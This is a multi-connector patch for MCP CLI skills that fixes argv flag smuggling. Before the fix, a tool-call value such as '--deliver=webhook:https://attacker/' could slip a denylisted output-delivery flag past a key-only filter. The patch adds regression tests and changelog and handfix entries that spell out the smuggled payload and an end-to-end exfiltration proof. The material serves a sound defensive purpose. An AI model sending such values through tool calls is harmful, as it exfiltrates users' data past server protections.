-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/itglue/handfixes.json
+++ b/skills/itglue/handfixes.json
@@ -147,6 +147,35 @@
      "not_contains": "\"--since\", \"2030-01-01\""
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/itglue/handfixes.json
+++ b/skills/itglue/handfixes.json
@@ -162,8 +162,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -173,7 +185,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/kaseya-bms/CHANGELOG.md
+++ b/skills/kaseya-bms/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/kaseya-bms/CHANGELOG.md
+++ b/skills/kaseya-bms/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/kaseya-bms/CHANGELOG.md
+++ b/skills/kaseya-bms/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/kaseya-bms/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/kaseya-bms/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/kaseya-bms/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/kaseya-bms/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/kaseya-bms/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/kaseya-bms/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/kaseya-bms/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/kaseya-bms/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/kaseya-bms/handfixes.json
+++ b/skills/kaseya-bms/handfixes.json
@@ -186,6 +186,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/kaseya-bms/handfixes.json
+++ b/skills/kaseya-bms/handfixes.json
@@ -201,8 +201,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -212,7 +224,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/knowbe4/CHANGELOG.md
+++ b/skills/knowbe4/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/knowbe4/CHANGELOG.md
+++ b/skills/knowbe4/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/knowbe4/CHANGELOG.md
+++ b/skills/knowbe4/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/knowbe4/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/knowbe4/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/knowbe4/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/knowbe4/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/knowbe4/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/knowbe4/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/knowbe4/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/knowbe4/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
